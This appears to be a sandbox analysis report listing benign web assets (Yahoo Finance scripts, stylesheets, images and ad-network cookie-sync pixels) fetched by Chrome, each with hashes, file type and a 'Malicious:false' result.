                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2982
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.428763733421834
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:kHbLZQfmz8GO5bB6GOox1GOGU9dNbHGOh/gr51jGO+om69CGOUj5MueOSy9DOGOF:IZQeXEBhbxkhYDbmSbT695xUDyPfI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:722BD6C7FF819E0A2C51320721727E29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DFB77DEEE0B07DEFB7DF0CD90563067CF4E29950
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9EF32B4C82539F9DAC85C8C115E8F4AC50E40AE6BA24321F46BB2EF716D73297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1CE09006FE564FA21E9D7F8FE5238437011D48D3C3BBC1E4C2AB60A8AA2D1F5F91B710E94F90CCC89C35EA7CAC9D5DB5AF8D00094443C55B75B6432E39A568BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://rtb.gumgum.com/usync/prbds2s?gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dgumgum%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><head><title></title></head><body>.<img src="https://secure.adnxs.com/getuid?https://usersync.gumgum.com/usersync?b=apn&i=$UID" style="display:none;"/>.<img src="https://x.bidswitch.net/sync?ssp=gumgum2&user_id=e_5a867c78-d90d-4df8-b8ff-e041d0dc2e22&gdpr=0&gdpr_consent=&us_privacy=1YNN" style="display:none;"/>.<iframe src="https://c1.adform.net/serving/cookie/match?party=1301&gdpr=0&gdpr_consent=" style="display:none;"></iframe>.<img src="https://us-u.openx.net/w/1.0/cm?_={CACHEBUSTER}&id=47f31213-389c-4904-aaa6-9b11aab9c211&gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dopx%26i%3D" style="display:none;"/>.<img src="https://sync.srv.stackadapt.com/sync?nid=1&gdpr=0&gdpr_consent=" style="display:none;"/>.<iframe src="https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV81YTg2N2M3OC1kOTBkLTRkZjgtYjhmZi1lMDQxZDBkYzJlMjI=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv" style="display:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (27104)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.361148094990428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:af8/g/Nl1s/stRfo0B2FwyNxdYKriRzCsvFvCuQ:afUoNlM0fYrDuCuQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C4F8F606E8D26E30B45D83965E4C0905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F791F5B936EAC352D7F483A12450E6B9DD064772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:27A7C1F2F2C7018314D78B422F71E0EDA4F6904F261E36D93956F65E308D82EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:11F3BB13686F77E0D40829826CC45A1E456978FFFCB0677FA16F1E1AE9C2A1558A2048FF376D9B486B5263D8572367FF2031F9A07F3DCAB152A69FF15D98EAC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var comments = 'User-Sync: generated: 2024-09-25 20:33:51 PDT';.var rtb_sync = {"consent_rate":100,"reset_rate":0,"ttl":14,"sample":100,"max_pixels":16,"pixel_sets":{"rtb":{"sample":100,"pixels":{"1185":{"ttl":7,"img":"https:\/\/ad.turn.com\/r\/cs?pid=6","secure":{"img":"https:\/\/ad.turn.com\/r\/cs?pid=6"},"priority":7,"partner":"amobee"},"1902":{"priority":17,"ttl":2,"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0","secure":{"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0"},"partner":"quantcast"},"1986":{"priority":7,"ttl":1,"img":"https:\/\/ib.adnxs.com\/getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30","secure":{"img":"https:\/\/secure.adnxs.com\/getuidnb?https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30"},"partner":"xandr"},"2046":{"priority":13,"ttl":7,"img":"https:\/\/token.rubiconproject.com\/token?pid=2046&pt=n&a=1",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5558)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5559
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.017140977231654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:tefUsAyvP1jZcZy4rHAV6FrFIQJ/XIAMrCfrmu2J0kDP6B3Iv8e/XI7:YbaZ7AV6BUrCTgJPS7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CEBEE7506E4E97437F4CD76B9B4045B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:98FC1B6BCEBCCCC195624322BD38636FF65AF96A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F450031B686C18CF3C80AA7AE9598507C27ACE1440C6363DDDA366A51DF5AF64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3A39075F116F1B2A80F3EAC093C23D3C369DE11A19C0883575A5BA606F15D3BA47DC2CE0A62E1E172918B426CAA5F4773CB8FC55A813A27B1B5D9452E9E96CCB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/ResearchReports.B2KK9kVy.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.settingItem.yf-1vwimp8{padding:var(--space-2)}.heading.yf-1vwimp8{font-size:var(--font-m);font-weight:var(--font-bold);padding:var(--space-2)}.settings.yf-1vwimp8{border-top:1px solid var(--separator)}.content.yf-1ju094f.yf-1ju094f{width:234px;border-radius:var(--border-radius-m)}.keyEvents.yf-1ju094f.yf-1ju094f{display:flex;flex-direction:column;padding:10px;background-color:var(--surface1);gap:var(--space-3)}.checkbox-input.yf-1ju094f.yf-1ju094f{accent-color:var(--hovered-emph-same);height:1.25rem;width:1.25rem;vertical-align:middle;border-width:2px;margin-right:var(--space-2)}.ctls.yf-1ju094f.yf-1ju094f{display:flex;width:100%;justify-content:space-between;gap:var(--space-2);align-items:center;padding-top:1px}.ctl-right.yf-1ju094f.yf-1ju094f{display:flex;gap:var(--space-2)}.item.yf-1ju094f.yf-1ju094f{padding:var(--space-2);border-bottom:1px solid var(--separator)}.key-events.yf-1ju094f.yf-1ju094f{display:flex;gap:var(--space-1)}@media only screen and (min-width: 1050px){.ctls.yf-1j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, progressive, precision 8, 970x250, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):111945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.97126150924802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:4a2JkjI199FNbOqPFYDVG+pVrdkz8ybiarIK:5jI1TFNUGEkzLrIK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3B7B3B633F1D496C35550E39B0F3CB41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:914F5198F179DE770B176338C3556016BB3EFC8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BB5EB1DF5B41C7F01D60927E85F0E30D0493452F8E2BCD797959A665F5E14D87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1F1BA7FED07BDE25A9C40530B6E0B0C3EB9B6D85B79E04804A26373496BD5F70594A257EB855BAF7F62D17C4BE8B9ABE15F61D42328FE616AD204E2AE5CABD79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/default/20181213/Finance_Brand_Filler__970x250_Look_1.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.024991429058118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YRM9WREaKs6LMO/fVVp14VSi9upjRbLvSaijJphACv/Y4:YsWizvLP/fVV0VSi9MBLKnJpGCF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D923F46C0DD22CD17A238D3BA19E56B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:89805A16391960F36F6D67A9D528D38FB698CC9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D4E7028C460E8A472316C70AEBA55F090B5A80CE088797485E072896BFFC8B0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC85810FFA24AD0583C347417E4C86EE949B4D1DCC8844FDFFF4722A2F31E94B86DF0DC92ADCA96852B10FE3CF61E226950F33BACEFFD416782504541CE3F4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"timestamp":"2024-09-30T17:23:11.265+00:00","path":"/admax/bid/partners/YPBJS","status":404,"error":"Not Found","requestId":"1f7d2677-153962558"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.821189188225222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:q3llbEBrMFBnUb7wl2eambhD2xakD9sYDtPNutEa7njWBJUSyAfkJ2Axxll+EYPW:q3HERMFBs8EePCxachatSyyU0dP5Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0EF42A67AEC0F7C34642D374A2B10FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:110FD90EA16F09A6229418E2C754BB200CA0A420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E475589F859892FDF87D7AB343F0D0014171416E852EE65664D0DA44CEE5569A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD12D0259AD116CC6F2A8A1AAFC42B5259661B71F1F4099E736BF5D8FB09E6A2DFA45744B9C5725402BE60A628FAB4F99E92BA3A56072C052D1D8274819AFDD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:..if (typeof _tb_dis === 'undefined' || _tb_dis === null) {. var _tb_dis = false;.}.if (!_tb_dis) {. var pm_ppy = "yahooweb-network";.. var _pmep = '//pm-widget.taboola.com/';. var _pmep_geo = '//pm-widget.taboola.com/';. if (document.URL.indexOf('https://') > -1) {. _pmep = _pmep.replace(/88\//gi, '90/');. _pmep_geo = _pmep_geo.replace(/88\//gi, '90/');. }. var _pmpmk = pm_ppy + '/pmk-20220605.1.js';. var _pmasync = true;. var _pmoptimization = true;. var _pmoptimizationmanipulation = true;. var _pmhp = false;. var _pmsb = false;.. function _pmloadfile(fileName) {.. if (_pmasync) {. var js, elements = document.getElementsByTagName("head")[0];. js = document.createElement("script");. js.setAttribute("type", "text/javascript");. js.setAttribute("src", fileName);. js.setAttribute('async','');. js.setAttribute('crossorigin', 'anonymous');. elements.appen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (14567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.233891295924048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:/lNH7DWdKQtK+ABPYUc3CGuucPoUq3xeQAazzlQ:vHXBPYU6CGNcPoI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF6533FEBE2F4FB2E2DBAA32B38C5D20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8B293E36B0E1C49F68C3D7F93968A0101A372324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7CD57326970A4C3C96D26E9B5F95C3021E823A747DC0D55B89745075F3678FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8923B35A32E17F097602400992875496B49EBDDB9C8DDAC882D2EB835C190C1FB8DD1FF888BDDE1ADA67B3725CBDCE0A23C96A7DFA8799A2E0566A548B989C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-tabs-1.12.6-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-tabs",[],e):"object"==typeof exports?exports["wafer-tabs"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-tabs"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(a[i])return a[i].exports;var o=a[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,e),o.l=!0,o.exports}var a={};return e.m=t,e.c=a,e.d=function(t,a,i){e.o(t,a)||Object.defineProperty(t,a,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var a=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(a,"a",a),a},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,a){"use strict";function i(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11174)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.220957424803642
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Ak4To7znhg2gJcCbBBeofDXC8Rd1djz1Nu4Fa6FaY8cwJKGarySx:Goe2WVb6o7PdNuSFaVKGWyE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D171C9D7A4D56F333BFBA7D6897CFC91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9BA9EF334353732D9F856DFC57161AAF456B2E17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CC06AF70B60673C2672EE9447CDC94CF08A720465D751BE9585AC3A28D9C4940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E192F375144669A82639A768E382578D980CF441F253F91AD3C0DE0852273E22509DF149AADC34ABBF98C79DC96B6AB146D99E0205B450EFD045626BEB2380A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-de239c91.6dcc2f7040aed13dcad1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-de239c91.6dcc2f7040aed13dcad1.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[9503],{1772:(e,r,a)=>{var t=a(4603);var i,o;i="undefined"!=typeof window?window:a.g,(o=void 0!==t.mE?t.mE:i.CIQ).Marker||(o.ChartEngine.helpersToRegister.push((function(e){e.markerHelper={chartMap:{},classMap:{},domMarkers:[],visibleCanvasMarkers:[],highlighted:[],placementMap:{}}})),o.ChartEngine.prototype.addToHolder=function(e){var r=this.panels[e.params.panelName];if(r){var a=e.params,t=e.node,i=e.stxNodeCreator;i&&i.prepareForHolder&&(t=i.prepareForHolder(e)),a.chartContainer?this.container.appendChild(e.node):a.includeAxis?r.holder.appendChild(e.node):r.subholder.appendChild(t),e.chart=r.chart,i&&i.addToHolder&&i.addToHolder(e),i&&i.expand&&o.Marker.initializeScrollBehavior(i)}},o.ChartEngine.prototype.getMarkerArray=function(e,r){var a=[];for(var t in this.markers)for(var i=0;i<this.mar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/v000/sync?pn_id=c&google_gid=CAESEG_UtkUqS2lgD4WFH_TnuYk&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.150864266978109
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLbGPGuXVGTq3xGzGeLGSoGQlnGMGlTIqdhgDa4xR2Gj4mf82GjGsO8KwS7xj:Di+hmQqUGSbQMH76GO2Gj4mk2Gj0lII
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:931D6AB365B23FC2F7473292055449AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BBF32F6AFD4B48B7E3CCA4E3724947EA8EF6181D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:53360A8C2CA513F21F0235F4DF7FCA1117A2E8F40E910D78566D9C6059431522
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:45169EBF0C9CBC39D577F95FC6B3E417E58FC78DE792697C2879A3A23917378FC7C26262760D1D6FE0C539E802A3AA772D1EEFD4D4C9B595FB0EF1FAF8EE0AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/weather-svg/MOSTLY_CLOUDY_DAY.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="7.054%" y1="46.73%" x2="65.562%" y2="25.496%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M44 15.23c0 8.462-6.77 15.232-15.23 15.232H9.307C4.23 30.462 0 26.23 0 21.154s4.23-9.308 9.308-9.308c1.523 0 3.046.339 4.4 1.185C14.892 5.585 21.154 0 28.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3189), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.907916612240295
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:alLcAReRR1/z/hf/VK/hR/O/P/Gs/e0/LESg//x/p/Oi/Y/O/GK/6/Ga/S/GH/G2:UyRqSV+wRDSdWFoaj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BC46E077D113750E408F798C847B497C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B983E5C0D4E936517CC063C12F2F1927920ED74D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:700DA3D651AD09E5004642F385DEC003198BAEA7119F21BBF3FBDEF3801672B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:52865AEE6A09143F09148839AA8EB5D907F3B2363106EE3AD5D451EEACB929A59D4E634A360D54C94D386AA35789AFF48E25537A4B0B542AA458521BEAA9D9ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/css/finQuote-cc91ea5c.b9a6c12fc99ea24dec24.css
